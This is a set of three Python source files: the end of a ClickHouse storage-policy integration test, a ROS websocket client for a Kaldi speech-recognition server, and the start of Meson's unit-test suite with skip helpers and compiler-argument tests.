PARTITION BY toYYYYMM(d)
SETTINGS storage_policy='small_jbod_with_external'
""")
for _ in range(5):
data = []
dates = []
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB value
dates.append("toDate('2019-03-05')")
node1.query("INSERT INTO freezing_table VALUES {}".format(','.join(["(" + d + ", '" + s + "')" for d, s in zip(dates, data)])))
disks = get_used_disks_for_table(node1, "freezing_table")
assert len(disks) > 1
assert node1.query("SELECT COUNT() FROM default.freezing_table") == "50\n"
node1.query("ALTER TABLE freezing_table FREEZE PARTITION 201903")
# check shadow files (backups) exists
node1.exec_in_container(["bash", "-c", "find /jbod1/shadow -name '*.mrk2' | grep '.*'"])
node1.exec_in_container(["bash", "-c", "find /external/shadow -name '*.mrk2' | grep '.*'"])
finally:
node1.query("DROP TABLE IF EXISTS default.freezing_table")
node1.exec_in_container(["rm", "-rf", "/jbod1/shadow", "/external/shadow"])
def test_kill_while_insert(start_cluster):
try:
name = "test_kill_while_insert"
node1.query("""
CREATE TABLE {name} (
s String
) ENGINE = MergeTree
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
data = []
dates = []
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB value
node1.query("INSERT INTO {name} VALUES {}".format(','.join(["('" + s + "')" for s in data]), name=name))
disks = get_used_disks_for_table(node1, name)
assert set(disks) == {"jbod1"}
start_time = time.time()
long_select = threading.Thread(target=node1.query, args=("SELECT sleep(3) FROM {name}".format(name=name),))
long_select.start()
time.sleep(0.5)
node1.query("ALTER TABLE {name} MOVE PARTITION tuple() TO DISK 'external'".format(name=name))
assert time.time() - start_time < 2
node1.restart_clickhouse(kill=True)
try:
long_select.join()
except:
""""""
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["10"]
finally:
try:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
except:
"""ClickHouse may be inactive at this moment and we don't want to mask a meaningful exception."""
def test_move_while_merge(start_cluster):
try:
name = "test_move_while_merge"
node1.query("""
CREATE TABLE {name} (
n Int64
) ENGINE = MergeTree
ORDER BY sleep(2)
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
node1.query("INSERT INTO {name} VALUES (2)".format(name=name))
parts = node1.query("SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 2
def optimize():
node1.query("OPTIMIZE TABLE {name}".format(name=name))
optimize = threading.Thread(target=optimize)
optimize.start()
time.sleep(0.5)
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
exiting = False
no_exception = {}
def alter():
while not exiting:
try:
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
no_exception['missing'] = 'exception'
break
except QueryRuntimeException:
""""""
alter_thread = threading.Thread(target=alter)
alter_thread.start()
optimize.join()
time.sleep(0.5)
exiting = True
alter_thread.join()
assert len(no_exception) == 0
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["2"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
|
kaldi_ros.py | # Original Source Code: https://github.com/alumae/kaldi-gstreamer-server
__author__ = 'tanel and flier@techfak.uni-bielefeld.de'
# STD
import os
import sys
import json
import time
import Queue
import urllib
import argparse
import threading
# WS4PY
from ws4py.client.threadedclient import WebSocketClient
# ROS
import rospy
def rate_limited(maxPerSecond):
minInterval = 1.0 / float(maxPerSecond)
def decorate(func):
lastTimeCalled = [0.0]
def rate_limited_function(*args, **kargs):
elapsed = time.clock() - lastTimeCalled[0]
leftToWait = minInterval - elapsed
if leftToWait > 0:
time.sleep(leftToWait)
ret = func(*args, **kargs)
lastTimeCalled[0] = time.clock()
return ret
return rate_limited_function
return decorate
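# Usage sketch for the decorator above; _demo_poll is hypothetical. Note that
# time.clock() measures CPU time on some platforms, so time.time() or a
# monotonic clock would be the modern choice.
@rate_limited(2)  # at most two calls per second
def _demo_poll():
    return time.time()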
class KaldiRosClient(WebSocketClient):
def __init__(self, audiofile, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
save_adaptation_state_filename=None, send_adaptation_state_filename=None):
super(KaldiRosClient, self).__init__(url, protocols, extensions, heartbeat_freq)
self.final_hyps = []
self.audiofile = audiofile
self.byterate = byterate
self.final_hyp_queue = Queue.Queue()
self.save_adaptation_state_filename = save_adaptation_state_filename
self.send_adaptation_state_filename = send_adaptation_state_filename
@rate_limited(30)
def send_data(self, data):
self.send(data, binary=True)
def opened(self):
rospy.loginfo(">>> Socket connection is open now")
def send_data_to_ws():
if self.send_adaptation_state_filename is not None:
rospy.loginfo(">>> Sending adaptation state from %s" % self.send_adaptation_state_filename)
try:
adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
except:
e = sys.exc_info()[0]
rospy.logerr(">>> Failed to send adaptation state: %s", str(e))
with self.audiofile as audiostream:
for block in iter(lambda: audiostream.read(self.byterate / 4), ""):
self.send_data(block)
rospy.logdebug(">>> Audio sent, now sending EOS")
self.send("EOS")
t = threading.Thread(target=send_data_to_ws)
t.start()
def received_message(self, m):
response = json.loads(str(m))
if response['status'] == 0:
if 'result' in response:
trans = response['result']['hypotheses'][0]['transcript']
if response['result']['final']:
# print >> sys.stderr, trans,
# self.final_hyps.append(trans)
rospy.loginfo(trans.replace("\n", "\\n"))
else:
    print_trans = trans.replace("\n", "\\n")
    if len(print_trans) > 80:
        print_trans = "... %s" % print_trans[-76:]
    rospy.logdebug(print_trans)
if 'adaptation_state' in response:
if self.save_adaptation_state_filename:
print >> sys.stderr, "Saving adaptation state to %s" % self.save_adaptation_state_filename
with open(self.save_adaptation_state_filename, "w") as f:
f.write(json.dumps(response['adaptation_state']))
else:
rospy.logerr("Received error from server (status %d)" % response['status'])
if 'message' in response:
rospy.logerr(">>> Error message:", response['message'])
def get_full_hyp(self, timeout=60):
return self.final_hyp_queue.get(timeout=timeout)
def closed(self, code, reason=None):
self.final_hyp_queue.put(" ".join(self.final_hyps))
def main():
rospy.init_node('kaldi_ros')
parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
parser.add_argument('-u', '--uri', default="ws://localhost:8181/client/ws/speech", dest="uri",
help="Server websocket URI")
parser.add_argument('-r', '--rate', default=32000, dest="rate", type=int,
help="Rate in bytes/sec at which audio should be sent to the server. NB! For raw 16-bit audio it must be 2*samplerate!")
parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
parser.add_argument('--content-type', default='',
help="Use the specified content type (empty by default, for raw files the default is audio/x-raw, layout=(string)interleaved, rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
parser.add_argument('audiofile', help="Audio file to be sent to the server", type=argparse.FileType('rb'),
default=sys.stdin)
args = parser.parse_args()
content_type = args.content_type
if content_type == '' and args.audiofile.name.endswith(".raw"):
content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1" % (
args.rate / 2)
ws = KaldiRosClient(args.audiofile, args.uri + '?%s' % (urllib.urlencode([("content-type", content_type)])),
byterate=args.rate,
save_adaptation_state_filename=args.save_adaptation_state,
send_adaptation_state_filename=args.send_adaptation_state)
ws.connect()
rospy.spin()
if __name__ == "__main__":
main()
|
run_unittests.py | #!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
    curdir = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(curdir)
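# Usage sketch for chdir() above: the working directory is restored on
# exit, even when the body raises; _demo_chdir is hypothetical.
def _demo_chdir():
    with chdir(tempfile.gettempdir()):
        return os.getcwd()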
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
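# Usage sketch; 'libfoo.so' is a hypothetical ELF shared library path.
def _demo_dynamic_section():
    soname = get_soname('libfoo.so')  # e.g. 'libfoo.so.1'
    rpath = get_rpath('libfoo.so')    # e.g. '$ORIGIN/../lib', or None
    return soname, rpath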
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
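# Usage sketch for the decorator above; _needs_ninja is hypothetical and
# 'ninja' is only an example executable name.
@skipIfNoExecutable('ninja')
def _needs_ninja():
    return shutil.which('ninja')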
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
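# Usage sketch for temp_filename() above: the file exists inside the block
# and is deleted afterwards; _demo_temp_filename is hypothetical.
def _demo_temp_filename():
    with temp_filename() as fname:
        with open(fname, 'w') as f:
            f.write('scratch data')
        return os.path.exists(fname)  # True inside the context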
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *args, **kwargs):
    if cmd == 'pkg-config':
        return None
    return old_which(cmd, *args, **kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
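# Usage sketch for no_pkgconfig() above: inside the context, pkg-config
# lookups behave as if it were not installed; _demo_no_pkgconfig is
# hypothetical.
def _demo_no_pkgconfig():
    with no_pkgconfig():
        return shutil.which('pkg-config')  # None while the override is active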
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(cc, ['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
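# Hedged toy model of the ordering the assertions above rely on: distinct
# new search paths are prepended as a block, and duplicates already in the
# list are dropped, so the most recently added path wins the search order.
def _toy_prepend_dedup(args, new_paths):
    kept = [a for a in args if a not in new_paths]
    return list(new_paths) + kept
# e.g. _toy_prepend_dedup(['-Ifoo', '-I..'], ['-Ifoo', '-Ibaz'])
#      -> ['-Ifoo', '-Ibaz', '-I..']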
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-ldl is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Use GNU ld so that library arguments are grouped with --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Check the initial native form
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# @PLAINNAME@ and @BASENAME@ are only defined for a single input
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
